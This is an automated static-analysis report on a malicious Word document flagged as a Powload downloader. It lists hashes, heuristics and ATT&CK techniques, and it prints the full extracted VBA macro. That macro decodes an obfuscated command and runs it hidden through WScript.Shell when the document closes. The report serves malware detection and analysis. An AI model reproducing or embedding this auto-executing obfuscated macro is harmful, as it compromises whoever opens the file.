Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a52192465084e717…

MALICIOUS

Office (OOXML)

Size: 53.2 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-04-18
MD5: 45fde170eec6aca0c6db4c4044343e23
SHA-1: 8591d082074590978cf8477a727a72a19dd027a7
SHA-256: a52192465084e717ab601dda5a7d7f55530bdc206c84f634cc12467aede8c6c8
Risk Score: 290

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is an Office document containing VBA macros. The AutoClose macro is present and uses WScript.Shell to execute a command. The script appears to download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Downloader.Powload-6707242-0'. The obfuscated nature of the script and the lack of specific URLs prevent a more precise family attribution.

Heuristics (7)

  • ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
         If reoffense - overexpectation > 1 Then
           CreateObject("WScript.Shell").Run aquavit, 0
           azyme = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
         If reoffense - overexpectation > 1 Then
           CreateObject("WScript.Shell").Run aquavit, 0
           azyme = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
      nonadvertence = Array("r", "R", "U", "y", "s", "O", "Q", "Z", "Q", "p", "U", "y", "y", "j", "J", "E", "E", "x", "i", "K", "r", "s", "R", "c", "a", "K", "i", "Y", "s", "c", "a", "Q", "c", "s", "U", "s", "b", "B", "O", "b", "i", "r", "E", "0", "n", "u", "E", "y", "Q", "K", "Z", "O", "j", "U", "j", "4", "g", "y", "r", "s", "I", "y", "K", "g", "r", "2")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2148 bytes
SHA-256: 7441f6bf1775058b629f83f77d0c97a87b954fd8cc9f527d98482d6c3d5ee28a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function corkscrewed(nonadvertence)
  undecidedness = Array("I", "U", "J", "b", "Y", "y", "0", "r", "p", "Q", "B", "s", "x", "Z", "c", "K", "u", "O", "2", "j", "g", "i", "4", "E", "n", "a", "R")
  vaisya = Array("=", "h", ":", "c", "v", "t", "I", "m", " ", "e", "b", "a", "f", "x", "n", "r", "O", ".", "d", "p", "u", "o", "?", "/", "S", "i", "s")
  
  squawroot = vbNullString
  
  For Each gumshoeing In nonadvertence
    adoptive = midwinter(gumshoeing, undecidedness, UBound(undecidedness))
    If adoptive > -1 Then
    squawroot = vaisya(adoptive) & squawroot
    End If
  Next
  
  corkscrewed = StrReverse(squawroot)
  
End Function

Public Function midwinter(zanclidae, hawkings, hemoglobinometer)
  macrosplanchnic = 3
  municipal = 1992
  For macrosplanchnic = 0 To hemoglobinometer
    If hawkings(macrosplanchnic) = zanclidae Then
     municipal = macrosplanchnic
    End If
  Next

  If municipal = 1992 Then
    municipal = -1
  End If
  
  midwinter = municipal
End Function

Sub AutoClose()
  nonadvertence = Array("r", "R", "U", "y", "s", "O", "Q", "Z", "Q", "p", "U", "y", "y", "j", "J", "E", "E", "x", "i", "K", "r", "s", "R", "c", "a", "K", "i", "Y", "s", "c", "a", "Q", "c", "s", "U", "s", "b", "B", "O", "b", "i", "r", "E", "0", "n", "u", "E", "y", "Q", "K", "Z", "O", "j", "U", "j", "4", "g", "y", "r", "s", "I", "y", "K", "g", "r", "2")
  ovariosteresis = corkscrewed(nonadvertence)
  
  Application.Run "stalagmitically", ovariosteresis
  
End Sub


Private Sub stalagmitically(aquavit)
   
   overexpectation = DateDiff("s", #1/1/1970#, Now())
   azyme = True
   
   While azyme
     reoffense = overexpectation + 60
     If reoffense - overexpectation > 1 Then
       CreateObject("WScript.Shell").Run aquavit, 0
       azyme = False
      End If
     
   Wend

End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes
SHA-256: 0dedcaac6304169b8abf2a3b4d3fe56cf643f23bf02d1666b20f40c1562506a8
Detection
ClamAV: Doc.Downloader.Powload-6707242-0
Obfuscation or payload: unlikely